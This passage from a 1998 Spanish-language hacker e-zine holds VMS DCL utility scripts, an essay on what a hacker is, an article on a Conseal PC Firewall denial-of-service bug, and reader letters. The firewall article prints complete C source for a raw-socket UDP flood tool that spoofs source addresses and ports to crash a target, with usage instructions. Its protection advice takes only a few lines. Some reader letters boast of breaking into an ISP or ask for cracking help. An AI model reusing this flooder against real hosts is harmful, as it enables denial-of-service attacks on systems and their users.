- $ if monitored_node.eqs."TEGAN" then goto search_file_tegan
- $ if f$search("nyssa.dat9") .nes. "" then goto file_exist
- $ goto continue
- $ search_file_tegan:
- $ if f$search("tegan.dat9") .nes. "" then goto file_exist
- $ continue:
- $ say "hit "
- $ inquire/nopunctuate choice9 "Who are we hunting for? "
- $ if choice9 .eqs. "" then exit
- $ count = 0
- $ bell_sound[0,8]=%X07
- $ top:
- $ sho user/output='monitored_node'.dat9
- $ purge 'monitored_node'.dat9
- $ set message/nofac/noid/notext/nosev
- $ search 'monitored_node'.dat9 'choice9'
- $ a=$severity
- $ if a .eqs. "1" then goto found_user
- $ set message 'temp_msg9'
- $ count = count + 1
- $ if count .ge. 'loop_count' then goto give_up
- $ delay
- $ goto top
- $ file_exist:
- $ say "ERROR - Could not create temporary data file."
- $ say "Please delete or rename ''NODE'.DAT9"
- $ exit
- $ found_user:
- $ say bell_sound
- $ say "''choice9' is now online on node ''monitored_node'."
- $ say bell_sound
- $ goto door
- $ give_up:
- $ say " "
- $ say "''choice9' has not yet logged in on ''monitored_node'."
- $ door:
- $ say bell_sound
- $ say "HUNT routine has terminated on node ''monitored_node'."
- $ delete/noconfirm/nolog 'monitored_node'.dat9;*
- $ set message 'temp_msg9'
- $ exit
-
- ------------ FIN -------------------------------------------------------------
-
- CODIGO DEL ALARM.COM
- <<<<<<<<<<<<<<<<<<<<
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- $ ! ALARM.COM
- $ ! By The Mentor
- $ ! Usage: SPAWN/NOWAIT @ALARM
- $ ! Strobes f$time() every 5 seconds until specified time
- $ ! is met at which time output is generated and process terminates.
- $ CLR = " "
- $ count = 0
- $ PID = F$PID(CONTEXT)
- $ TERMINAL = F$GETJPI(''PID',"TERMINAL")
- $ DEVICE = F$GETDVI(TERMINAL,"DEVTYPE")
- $ IF DEVICE .EQS. 110 THEN CLR = "[H[2J" ! VT220
- $ IF DEVICE .EQS. 98 THEN CLR = "[H[2J" ! VT102
- $ IF DEVICE .EQS. 96 THEN CLR = "[H[2J" ! VT100
- $ IF DEVICE .EQS. 64 THEN CLR = "HJ" ! VT52
- $ CLS = "WRITE SYS$OUTPUT CLR"
- $ DATE = F$CVTIME(F$TIME())
- $ NODE = F$GETSYI("NODENAME")
- $ bell[0,8]=%X07
- $ ON CONTROL THEN GOTO DOOR
- $ say = "write sys$output"
- $ say f$cvtime(,,"TIME")
- $ say " "
- $ say "Hit (RETURN)"
- $ say " "
- $ inquire/nopunctuate alarm "What time shall I ring you - "
- $ a_hour = f$element(0,":",alarm)
- $ a_minute = f$element(1,":",alarm)
- $ a_second = f$element(2,":",alarm)
- $ time_check:
- $ hour = f$element(0,":",f$cvtime(,,"TIME"))
- $ minute = f$element(1,":",f$cvtime(,,"TIME"))
- $ second = f$element(2,":",f$element(0,".",f$cvtime(,,"TIME")))
- $ if hour .ge. a_hour .and. minute .ge. a_minute .and. second .ge.
- a_second then goto top
- $ if hour .ge. a_hour .and. minute .ge. a_minute then goto top
- $ wait 00:00:05
- $ goto time_check
- $ top:
- $ count = count + 1
- $ cls
- $ say " "
- $ say " "
- $ say " "
- $ say " "
- $ say " "
- $ say " "
- $ say " "
- $ say " "
- $ say " "
- $ say " "
- $ say " "
- $ say " A L A R M O N"
- $ say bell
- $ say " ",f$element(0,".",f$cvtime(,,"TIME"))
- $ say " "
- $ say " "
- $ say " "
- $ say " "
- $ say " "
- $ say " "
- $ say " "
- $ say " "
- $ say " "
- $ wait 00:00:01.50
- $ if count .le. "6" then goto top
- $ door:
- $ say "ALARM OFF"
- $ say f$element(0,".",f$cvtime(,,"TIME"))
- $ say bell
- $ exit
-
- ------------ FIN -------------------------------------------------------------
-
- CODIGO DEL CGO.COM
- <<<<<<<<<<<<<<<<<<
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- $! CGO.COM
- $! By The Mentor
- $! One-Line compile/link/execute of C programs
- $! Usage: CGO :== @CGO.COM
- $! CGO filename
- $!
- $if p1 .nes. "" then c_filename :== 'p1
- $ write sys$output "Compiling:"
- $ cc 'c_filename/list='c_filename.lst
- $ write sys$output "Linking:"
- $ link 'c_filename ,options_file/opt
- $ write sys$output "Running:"
- $ assign/user sys$command sys$input
- $ run 'c_filename
- $ exit
-
- ------------ FIN -------------------------------------------------------------
-
- Bien, intentare traducir y adaptar otros textos de la Phrack que me
- interesen y distribuirlos a los proyectos de Raregazz y Underhack, este
- texto ha sido corregido y adaptado para poder ser entendidos por gente de
- todos los niveles pero si te interesa ver el original puedes verlo en la
- phrack19 es el 2#
-
- Saludos a los canales del irc Hispano #hack #hackers #hack_novatos y
- a todos los grupos H/P/C/V españoles.
- -E-
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- #############################
- # #
- # Que es un hacker #
- # #
- # By: Tasslehoff #
- # #
- # - J.J.F. / Hackers Team - #
- # #
- #############################
-
- Tras la anaquia, que podemos pensar que es Internet, podemos encontrar
- un mundo complejo y completo, con sus culturas y sociedades. Este mundo,
- supuestamente anarquico, acoge diversos grupos que se relacionan y
- desarrollan ahi; los cuales podemos clasificar de muy diversas formas; una
- es su situacion respecto a la ley, la ley del mundo no-electronico, otra es
- con arreglo a sus conocimientos ; otra importante clasificacion seria su
- etica, refieriendose con ello a su actitud con otros "ciuadanos" de la red y
- con los conocimientos que en ella, la red, uno puede encontrar.
-
- Podriamos decir que la comunidad de Internet se divide en cuatro
- grupos principales: 1- Usuarios normales, 2- Empresas, 3- Organizaciones
- gubernamentales y 4- Mundo Underground.
-
- El "mundo" Underground sera el lugar donde encontraremos a los
- infalibles "Hackers". Pero... ¿ Que es el mundo Underground ? Bueno,
- empezemos por definir que es Underground. El termino Underground biene
- definido o dado de los paises de habla Anglo-Sajona (Ingleses y Americanos)
- y se refiere a grupos de cultura minoritaria, que se desarrollan bajo la
- cultura general y que tienen unas determinadas creencias y filosofias
- bastante heterodoxas si los comparamos con la "mayoria cultural". Esta
- definicion es facilmnte aplicable a Internet donde encontraremos facilmente
- diversos grupos interesados en aspectos culturales, que normalmente
- considerariamos minoritarios. Es aqui, en el "mundo Underground" donde
- encontraremos grupos especialmente interesados en aspectos relacionados con
- la "seguridad informatica", ya sea en su "creacion" como en su "violacion".
- Este grupo de usuarios podemos lo podemos dividir en tres ramas: Wanabes,
- Crackers y Hackers. Llegando a este punto donde sabemos donde encontrar a
- los "Hackers" y sabien en que contexto se mueven, empecemos con la
- aproximacion a este grupo y de las diferentes definiciones que de el se
- hacen.
-
- Ciertos grupos empresariales , organicaciones gubernamentales, cuerpos
- de seguridad y colectivos en cierta forma retrogrados suelen definir
- "hacker" como esos "malas" personas que se dedican a burlar sistemas de
- seguridad, la copia y el robo asi como la destruccion de datos mas o menos
- valiosos almacenados en un ordenador, y a los cuales, los hackers, no tienen
- acceso legal. Los hackers son seres a los que hay que eliminar asi como a
- su perniciosa filosofia que poseen y que pone en peligro a todos los
- habitantes de la red y a sus datos, con sus maniobras y juegos causando
- "miles" de millones de perdidas con sus salvajes ataques. Bueno, es una
- definicion "curiosa", o decir algo, a tener en cuenta como a cualquier
- otra, ante todo en Internet hay libertad de expresion, aunque ellos, estos
- grupos decadentes y de concepciones de cierta manera arcaicas, cometen un
- error de definicion, para asi, defender sus intereses, no claramente
- identificables, y etica que nos intenta implantar.
-
- Por otro lado estan aquellos que navegando por la red encuentran
- ciertos articulos, comentarios, rumores... y devido a su inexperiencia o a
- que nadie les ha dado una definicion mejor consideran a los hackers como
- "Esos magos de las fuerzas de Internet" que "desafian a los poderosos". Los
- Hackers son "cojonudos" o "la ostia", son "tios guais" (de mayor quiero ser
- como ellos :) ), que se mueven como pez en el agua en Internet y el resto
- de las redes. Es una "bonita" definicion pero creo que "ligeramente" ;)
- incorrecta.
-
- La tercera definicion fue desarrollada hace tiempo, definiendo como
- hacker como a un programador com amplios conocimentos de seguridad
- informatica que puede descubrir bugs (agujeros) en el sistema de seguridad,
- sabiendo como aprobecharlos para entrar dentro del sistema gracias a esos
- fallos anteriormente descritos. Esta definion fue primeramente utilizada por
- los primeros "hackers" que salieron del M.I.T. (Massachuset Institute of
- Technology).
-
- Finalmente llegamos a lo que considero una definicion mas acertada,
- que no por ser mia es la mas correcta ni valida, pero que espero que de
- alguna manera resulte util y aclare aunque sea un poco este enrredo creado
- alrededor de los "Hackers" a los cuales o bien se les vilipendia o bien se
- les "ensalza" mas alla de cualquer limite logico hasta niveles de semidioses
- electronicos, lo cual no es correcto, a fin de cuentas, somo humanos, aunque
- a veces un poquito raros cuando nos colocan una pantalla y un teclado
- delante, pero bueno, vamos al asunto. Los "hackers" son en cierta forma
- programadores , guerreros y filosofos ¡ Menuda definicion verdad !, esperad
- que os lo aclare y no penseis que estoy ms loco de lo que realmente
- estoy ;).
-
- Los Hackers son programadores, Son programadores devido a que saben
- programar, sin unos conocimientos de programacion, S.O. y redes seria muy
- dificil que realizaran su labor como hackers, si no imposible. Si, ya se que
- en internet podemos encontrar programillas que realizan las labores mas
- tendiosas en lugar de realizarlas nosotros pero con dichos programas, no
- podemos sacar ni una pequeña parte del potencial que tenemos con unos
- conocimientos sobre UNIX, redes, S.O. en general, C, perl. Asi es importante
- saber. El saber, el conocimiento es el poder del hacker.
-
- Por otro lado podemos considerar a los hackers como guerreros. que
- luchan por defender la libertad de Internet. Una libertad que tanto Estados
- como grandes compañias intentan suprimir. Para ello, los hacker luchan de
- muy diversas formas: publicando articulos, e-zines, paginas web,
- informacion valiosa que nos permite ampliar los conocimientos y mantener la
- libertad. Tambien hay formas de "lucha" mas activas como la inutilizacion o
- hackeo de paginas web denigrantes, como las de pornografia infantil.
-
- Por ultimo, y en cierta forma abstracta se puede considerar a los
- hackers (o algunos hackers) como filosofos, con sus ideas de libertad cuasi
- absoluta en la red, una filosofia que desarrollan y defienden, poniendo esa
- libertad por encima de intereses economicos o individuales, siendo a veces
- perseguidos e insultados por los poderosos.
-
- Se deve recalcar tambien que todo lo que hacen los hackers, segun la
- filosofia en que se amparan, no es destructivo ni una busqueda de beneficios
- personales, los miembros del mundo underground que buscan esto ultimo se
- suelen definir como crackers y si bien algunos de estos tienen conocimientos
- que les podrian equiparar con los hackers, aunque la mayoria no los tengan,
- es la filosofia hacker lo que les diferencia a unos de otros.
-
- Pues nada, ahi teneis una definicion, espero que os guste y os
- parezca correcta si no, la borrais de vuestro disco y fuera. ;) ¡Espero que
- no!
- From: Tasslehoff
- - J.J.F. / Hackers Team -
- tasslehoff@jjf.org
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- Conseal PC Firewall Bug
- -----------------------
-
- By Bisho
-
- 1.- Conseal PC Firewall 1.2 y anteriores Bug
- 2.- Proteccion
- 3.- Herramientas
- 3.1.-Como funciona el programa
- 3.2.-conseal.c
-
- En este articulo voy a tratar un tema que me parece bastante
- interesante. Es un bug del Conseal PC Firewall. Se ha descubierto que tiene
- un fallo de DoS (denial os service) y muy facil de explotar. Bien vamos a
- ello :o).
-
- 1.- Conseal PC Firewall 1.2 y anteriores Bug
- --------------------------------------------
-
- Es un ataque bastante facil de DoS (denial of service). Solo funciona
- en las versiones anteriores a la de junio del 98 (ya que fue cuando se les
- notifico el fallo a los de Signal9 y arreglaron el bug en una semanita mas
- o menos), la cual es la version 1.2 o anterior. Pero en muchos sitios warez
- todavia tienen esta version, lo que hace que este ataque todavia funcione.
-
- La verdad es que este tipo no tiene nada de especial, un floodeo, pero
- cambiando las IP's se consigue que se cuelgue el ordenador incluso si se
- han cambiado los puertos. Esto causa que conseal se coma TODOS los recursos
- disponibles del ordenador y como resultanto un reseteo del mismo :o) si el
- ataque continua durante 10 a 30 segundos despues de colgarlo.
-
- 2.- Proteccion
- --------------
-
- La verdad es que es bastante simple, solo tienes que quitar el modo
- "learning" y el "logging". Signal9 se habia dado cuenta de este fallo mucho
- antes de que incluso este ataque se "sacara al mercado", por eso ahora la
- gente puede comprarse el firewall y tenerlo actualizado y te olvidas de
- problemas. Y para aquellos que lo han usado con un crack o con un generador
- de llaves (key generator), deciros que no estais tan protegidos como
- deberiais.
-
- 3.- Herramientas
- ----------------
-
- 3.1.- Como funciona el programa
- -------------------------------
-
- La manera que este programa usa para colgar el ordenador puede ser:
-
- 3.1.1.- Si el programa se esta ejecutando en modo "learning" se
- produce un flodeo y tratara todo el rato de escribir nuevas "rules"
- (reglas), esto provoca que use todos los recursos del ordenador y se
- cuelgue, e incluso un reseteo del ordenador.
-
- 3.1.2.- Si esta usando el modo de "logging" de los ataques o de la
- informacion que pasa a traves del firewall, esto hara que por culpa del
- numero de paquetes de informacion que intenta escribir se cuelgue.
-
- 3.2.-Conseal.c
- --------------
-
- Este es el codigo fuente del programa que explota el bug:
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- #include<sys/types.h>
- #include<sys/socket.h>
- #include<netinet/in_systm.h>
- #include<netinet/in.h>
- #include<netinet/ip.h>
- #include<netinet/udp.h>
- #include<errno.h>
- #include<strings.h>
- #include<netdb.h>
- #include <stdlib.h>
- #include<stdio.h>
- #ifdef BROKEN_LIBC#include <arpa/inet.h>
- #else
- #define u_char unsigned char
- #define u_short unsigned short
- #endif
- struct sockaddr sa;int
-
- main(int argc,char **argv)
- {
-
- int fd;
- int x=1;
- int hosti=192;
- int hostii=168;
- int hostiii=1;
- int meep=0;
- int fooport=1;
- int numpack=0;
- char funhost[15];
- struct sockaddr_in *p;
- struct hostent *he;
-
- u_char gram[36]=
- {
- 0x45, 0x00, 0x00, 0x26,
- 0x12, 0x34, 0x00, 0x00,
- 0xFF, 0x11, 0, 0,
- 0, 0, 0, 0,
- 0, 0, 0, 0,
-
- 0, 0, 0, 0,
- 0x00, 0x12, 0x00, 0x00,
-
- '3','1','3','3','7','8','9','0'
-
- };
-
- if(argc!=3)
- {
- fprintf(stderr,"Saihyousen, by Noc-Wage\n");
- fprintf(stderr,"The faster your connection to the internet is
- (latencywise, not bandwidth)\n");
- fprintf(stderr,"and the lower the CPU speed of the victimwill\nincrease
- probability of success\n");
- fprintf(stderr,"usage: %s victim num_of_packets Ex: saihyousen127.0.0.1
- 40000\n",*argv);
- exit(1);
-
- };
-
- if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1)
- {
- perror("requires RAW SOCKETS");
- exit(1);
- };
-
- #ifdef IP_HDRINCL
- if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
- {
- perror("setsockopt IP_HDRINCL");
- exit(1);
- };
-
- #else
-
- fprintf(stderr,"we don't have IP_HDRINCL :-(\n\n");
- #endif
-
- /* The stuff below is so that it's not fully sequential
- i.e 100.100.100.101, 100.100.100.102 */
-
- for (numpack=0;numpack<=atoi(argv[2]);numpack++)
- {
- if (meep==0) { ++hosti; meep++;
- }
- if (hosti>254) hosti=1;
- if (meep==1)
- {
- ++hostii; meep++;
- }
- if (hostii>254) hostii=1;
- if (meep==2) { ++hostiii; meep=0;
- }
- if (hostiii>254) hostiii=1;
-
- sprintf( funhost, "%i.%i.%i.%i",hosti,hostii,hostiii,hosti);
- (he=gethostbyname(funhost));
- bcopy(*(he->h_addr_list),(gram+12),4);
- if((he=gethostbyname(argv[1]))==NULL)
- {
- fprintf(stderr,"can't resolve destination hostname\n");
- exit(1);
- };
-
- bcopy(*(he->h_addr_list),(gram+16),4);
- fooport++;
- /* resets the port to 1 if it's nearing the end of possible values */
-
- if (fooport>65530) {fooport=1;};
- *(u_short*)(gram+20)=htons((u_short)fooport);
- *(u_short*)(gram+22)=htons((u_short)fooport);
-
- p=(struct sockaddr_in*)&sa;p->sin_family=AF_INET;
- bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr));
- if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(structsockaddr
- )))== -1)
- {
- perror("sendto");
- exit(1);
- };
-
- /*printf("Packet # %i\n", numpack); */
- /* Turn that on to see where you are.. it'll slow the attack though */
-
- };
-
- printf("Attack against %s finished", argv[1]);
- putchar('\n');
- return 1;
-
- }
-
- ------------ FIN -------------------------------------------------------------
-
- NOTA:
- -----
-
- Este programa deberia funcionar en cualquier plataforma Linux, no
- estoy seguro si chuta en FreeBSD, pero deberia, y si no trata de
- modificarlo a tu propio riesgo.
-
- Para una actualizacion de este firewall pasate por
- http://www.signal9.com. Esta version ya esta arreglada contra el bug :o).
-
- Si tienes algun comentario o lo que sea, mandame un par de lineas a:
- rolling_weables@hotmail.com y tratare de ayudarte :o).
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- ┌─────────────────┐
- < EL LECTOR OPINA >
- └─────────────────┘
-
- Deciros varias cosas que estamos viendo en la seccion del EL LECTOR
- OPINA, primero que no envies cosas que no hayais escrito vosotros sin la
- autorizacion del autor o por lo menos mantener los creditos, como a sucedido
- en el numero 6 que un lector envio un mail con un texto que se titulaba
- CARTA DEL JEFE INDIO y que resulto no ser suyo!! Si no sabes que decir,
- mejor no digas nada. Segundo, recibimos muchos articulos de gente que quiere
- escribir y nos dice si estamos interesados, la respuesta en SI, NO HACE
- FALTA QUE ENVIES UN MAIL PREGUNTADO, lo que teneis que hacer es escribir el
- articulo y enviarnoslo!!! Tercero, ahi gran cantidad de mail's que son
- realmente tontos, hemos dicho mil veces que no damos clases o sea que no
- hace falta que envies mail preguntando y tampoco hackeamos a peticion del
- lector o enviamos informacion. Con esto solo queremos decir que penseis que
- vais a decirnos antes de escribirnos!!!!!!
-
- Recomendamos leer nuestro FAQ.
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Thu, 22 Oct 1998 19:36:16 GMT
- From: brownies@xxxxxxxxxxxxxx (Pedro Fried Reinitz)
- To: Subject: help me
-
- Hola:
- Te escribimos desde chile para pedirte ayuda ya que estamos empezando o
- mejor dicho tratando de hacernos HAKERS.
- Te queriamos pedir ayuda con varias cosillas
- 1.-como uno empieza (que programas etc)
- 2.- me consegi linux y en realidad es mmmmm IMPOCIBLE a y
- 3.- algun program para hacer logos como el de su coolisimo web (ej jjm
- them ...).
-
- te lo agradeseria mucho tus segidores chilenos .....
- pd: si puedes mandarme algunos txt etc y material util seria muy feliz...
- adios y gracias denuevo
-
- <------>
-
- [ Pues lo mismo de siempre, para comenzar es simple curiosidad, estudia
- todo lo que pase por tus manos, saca tus propias conclusiones y asi
- seras un Hacker. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Thu, 22 Oct 1998 09:42:13 GMT
- From: "Luis" <"luis@xxxxxxxxxxxxxx"@xxxxxxxxxxxxxx>
- To: Subject: necesito informacion
-
- Me podrias ayudar con el desencriptador de claves John_15, que no tengo ni
- la mas minima idea de como usarlo.
-
- Luis Esteban
-
- <------>
-
- [ Te recomendamos el n6 de nuestro ezine, el cual se explica el uso del
- John The Ripper, entre otros :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Wed, 21 Oct 1998 05:51:33 GMT
- From: Jesus Avila <avimolje@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net Subject: Necesito ayuda.
-
- Tengo un telefono movil. Un Nokia.
- El problema es que no me acuerdo del Pin number o codigo de acceso del
- telefono.
-
- El telefono es un NOKIA NK503
- y el "type" es NHK-6RY
- Existe alguna manera de crakear el telefono?
-
- Muchas gracias
- --
- Jesus Avila
- BSc IT
-
- ==
- Jesus Avila Molina
- ETT esp. TELEMATICA
- BSc INFORMATION TECHNOLOGY
-
- <------>
-
- [ Leete el n6 de nuestro ezine y pasate por el web de CPNE, donde
- encontaras material muy interesante.
-
- http://cpne.islatortuga.com ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Tue, 20 Oct 1998 19:22:25 GMT
- From: "SparK" <sparkboy@xxxxxxxxxxxxxx>
- To: Subject: Una pregunta
-
- Hola equipo, les mando este mail porque quiero hacerles una pregunta...
- Soy un newbye que se esta guiando principalmente por sus e-zines y por las
- GTMHH de Carolyn Meinel, pero solo he encontrado los numeros 1, 2 y la
- mitad de la 3 en español.
- Le pregunte a la misma Carolyn donde los podia encontrar pero la respuesta
- que me dio (1/4 de linea) no me sirvio ya que ese servidor
- (uberhacker.islatortuga.com) no esta disponible.
- En fin, lo que quiero es saber si ustedes por favor me podrian mailear
- alguna direccion web o ftp para obtenerlas.
- Gracias
-
- <------>
-
- [ Pues ahora mismo no me acuerdo de ningun sitio en concreto pero pasate
- por Underhack o Iberhack. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Mon, 19 Oct 1998 14:38:27 GMT
- From: "alejandro andrade" <aandarde@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: hola re quiero informancion si sepuede?
-
- estoy llevando una investigacion en la escuela sobre los piratas en
- internet y en contre esta direccion asi que si podrian alguno de
- ustedes mandarme algo de que por estan en la red ? por que lo
- hacen , son un beneficio o un perjuisio quisiera saber mas sobre
- ustedes lo poco de se de ustedes es por revista a si que espero que
- me puedan dar esa informancion y si se puede ser como estedes
-
- me despido esperando su repuestas
-
- antetodo gracias
-
- <------>
-
- [ Primero no somos piratas, simplemente somos gente curiosa con ganas de
- explorar el mundo informatico. Nosotros investigamos y sacamos nuestros
- resultados, que pueden gustar o no pero eso no nos importa :) Claro que
- se puede ser como nosotros, pero ello con lleva mucho trabajo y ahi
- muy poca gente dispuesta a ello realmente. Leete nuestro FAQ. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sat, 17 Oct 1998 09:35:41 GMT
- From: "Mauricio Espinoza Loma" <esplom@xxxxxxxxxxxxxx>
- Subject: Preguntas
-
- solo tengio algunas preguntas
-
- - para que sirber el escanear una linea y scanear los puertos
- - Tambien quiero decir que no pude descomprimir el el escanaador de lineas
- de telefono
- Gracias...........
-
- <------>
-
- [ Escaner una linea?? Supongo que te refieres a un WarDialer, pues es un
- programa para buscar ordenadores conectados a la linea telefonica,
- mientras que un scaner de puertos es otro programa para saber que puertos
- tiene abiertos un sistema informatico.
- A que te refieres exactamente con que no pudistes descomprimir el
- programa ? ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sat, 17 Oct 1998 08:53:19 GMT
- From: "Mauricio E. L." <mauriciobo@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: Entusiasta a hacker
-
- Mira solo tengo algunas preguntas que quisiera que me la
- respondieses???
-
- 1.- Si un hacker es una persona mas estrictamente
- programador y el contruye programas para interrumpir sistemas.
- O si se vale de algunos defectos de los sistemas (ej: Unix
- para interrumpir ese sistema.??
-
- 2.- Quisiera que me ayudades a ser un hacker o a dar los
- primeros pasos ???
-
- Mi nombre: Mauricuio
- Edad: 20
- carrera: Ingeieria de sistemas
- Jobi : Programacion
- Interes: Hackers
-
- - Yo ya tube algunos buenos resultados el cual fue introducirme al servidor
- de un provedor de internet y sacar algunas cuentas ????
- Te agradeseria mucho si me pudieras ayudar, porque busque
- un grupo como ustedes hace tiempo..??
-
- Luego quisiera colaborar con su grupo
-
- <------>
-
- [ Un Hacker debe ser capaz de escribir sus propios programas y tambien debe
- ser capaz de explotar fallos en el sistema. Pues lee nuestro ezine que
- seguro que te sera de mucha ayuda :)
- Claro que puedes participar, escribe sobre algo que te guste y nos lo
- envias. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Wed, 14 Oct 1998 20:06:38 GMT
- From: "Lorena A" <alcaraz@xxxxxxxxxxxxxx>
- To: Subject: HELP!
-
- Hola no se si sera posible lo que voy a pedir
- pero resulta que ayer por icq, un tipo me volvio loca mi compu, segun el
- poedia ver todos mis archivos, no tengo idea, como pudo pasar, ayer recibi
- archivos desde icq, los cuales ingenuamente instale, eran unos Nuketes,
- como genocide y ese estilo, puede que me haya entrando a mi sistema por
- emdio de eso?
- La cosa es que yo, verifique con todos los antivirus habidos y por haber, y
- no me encuentra nada,
- Asique por medio de un virus no entro.
- Yo quiero saber si me pueden aconsejar algo, apra protejerme.
- Bueno, si pueden contestarme se los agradesco.
- Saludos
- Lorena.
-
- <------>
-
- [ Pues seguramente te habra metido en uno de esos nukes el BO (Back Orifice)
- o el Netbus, los cuales permite controlar un ordenador remotamente.
- Estos programas solo son dectados por pocos programas especificos por eso
- tus AV (AntiVirus) no han encontrado nada. Nosotros estamos trabajando en
- una herramienta que elimine el BO, pero mientras tanto, te remito a esta
- herramienta, la cual te sera muy util:
-
- http://www.genocide2600.com/~tattooman/new-uploads/boe.exe ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Wed, 14 Oct 1998 06:52:18 GMT
- From: Antonio Moreno <paj@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: FAVOR
-
- Hola! Soy un estudiante de InformAtica de GestiOn de primer año, y os
- escribo para saber si me podOis hacer un favor. Resulta que hay muchos
- amigos mios (incluso yo) que desean que no existiera la siguiente pagina.
- Gracias y espero que podeis ayudarme. Confio en vosotros. Espero que podais
- hacerlo cuanto antes. Ya segui las instrucciones de un fichero para obtener
- el password, pero no me ha funcionado. No lo entiendo. Siento no saber nada
- de Unix. Gracias anticipadas y hasta la proxima conexion! Saludos desde
- Murcia.
-
- <------>
-
- [ Sorry, pero no nos dedicamos a atacar servidores a peticion de los
- lectores. Leete el FAQ. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Tue, 13 Oct 1998 15:32:36 GMT
- From: JROBLES <JROBLES@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: No consigo bajar el numero 6
-
- Amigos del JJF, me dispongo como siempre a bajarme el ultimo numero
- de vuestro E-Zine, pero se me para de cargar en el articulo de Linux; lo
- he intentado varias veces pero no consigo bajarmelo entero.
- Os agradeceria me lo mandaseis por correo a mi e-mail
- GRACIAS
-
- <------>
-
- [ Pasate por nuestro FTP, que alli lo bajaras sin problema :) y si no
- ponte encima del link y pulsa el boton derecho y dale para salvar el
- fichero :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sun, 11 Oct 1998 09:16:20 GMT
- From: Lau <lau.x@xxxxxxxxxxxxxx>
- Subject: Ayudita !
-
- Hola soy Lau y tengo un problemita, en realidad no se si es un problema, te
- cuento en el chat un pibe me paso el siguiente programa: Back Orifice, me
- dijo que era algo asφ como un icq, pero nada que ver, con eso tiene control
- sobre mi compu, por un lado me gust≤ todo lo que pudo hacer Θl desde su casa
- y por otro no me gusta que tenga acceso a mi compu, quΘ hago, ayudame porfi.
- Estuve leyendo tus articulos, quiero aprender todo lo que esta en la pagina
- de hackers, me gusta, pero para eso primero quiero librarme de ese tipo,
- como hago, ayudame!!!!!!
-
- Lau
-
- Lau... desde Argentina
-
- <------>
-
- [ Eso es un programa para controlar un ordenador remotamente. Te
- recomendamos que utilizes esta herramienta:
-
- http://www.genocide2600.com/~tattooman/new-uploads/boe.exe ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sun, 04 Oct 1998 14:27:25 GMT
- From: <intrepido@xxxxxxxxxxxxxx>
- Subject: hola
-
- la pagina es una maza me gustaria saber con que programa la crean y donde
- los puedo conseguir desde ya gracias.
-
- <------>
-
- [ Pues facil, Notepad (Viene con el Win95/98/NT :) Rulez y las fabulosas
- manos de Mac Crack. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sun, 04 Oct 1998 11:23:31 GMT
- From: Abel Larrama <alarrama@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: desde uruguay.
-
- Hola a quien corresponda. Como dice el asunto soy un chico de uruguay
- que tengo 17 años, me encanta todo sobre computadoras, aunque me doy
- cuenta que no se casi nada, recien me inicio en el mundo de la red y me
- interesa saber toda informacion sobre hackers y crackers, me refiero a
- ustedes con el motivo de saber si me podrian ayudar porque quisas por
- ignorancia y aprendisaje me he vajado un archivo que dejo un bugs por el
- cual entra en mi pc un hack que no me deja aprender tranqui, no me
- molesta pero quiero saber cosas sobre ellos y como ser uno para poder
- evitarlos, no se como podre arreglar eso quisas con un format de disco,
- ya vere, me gusta lo que ustedes hacen y tambien me gustaria que me
- pudieran ayudar si no es mucha molestia, aunque sea un poco para poder
- prevenirme y saber algo mas de este fantastico mundo del pc y la net.
- Sin mas me retiro, agradeciendoles de ante mano.
-
- ABEL LARRAMA
- PD: por favor contesten esta carta mi nick es Jeque.
-
- <------>
-
- [ Para eso esta este ezine, para aprender todos :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Thu, 01 Oct 1998 15:37:16 GMT
- From: <drslump@xxxxxxxxxxxxxx>
- To: JJF Hacker Team
-
- Holas!
-
- Bueno, pues escribo esta critica a ver si vuestras mercedes conceden a
- ponerla en el ezine :))
-
- Bien, esto es un escrito para los hacker-wannabes que no son mas que esos,
- no me considero, ni probablemente llegue a serlo nunca, un hacker, pero
- lejos de eso , tampoco me considero un paleto que quiere llegar a ser
- hacker, pero que no quiere dejar su windows95 porque mola mas.
- Bueno, empiezo mi caotica critica a raiz de una discusion tenida por la
- *excelente* Vampire BBS.
- Creo que todo empezo cuando Wintermute ( hola Winter :) ) paso un forward
- del archifamoso texto de "linuxeros rules", ese en el que los linuxeros que
- no tienen ni puta idea usan linux porque "rules" y es guay ....
- Bien, todos los que andan por alli (y los que me conozcan) saben que soy un
- acerrimo defensor del linux, y entonces no pude reprimirme y salto cagandome
- en la madre que pario al que escribio el texto ese. Bueno , entonces Dairo,
- Winter, BitSpawn y no recuerdo quien mas, me dijeron que ese texto estaba
- dirigido a la bella poblacion de subnormales que dicen que "linux rules"
- pero que no lo han probado en su vida.
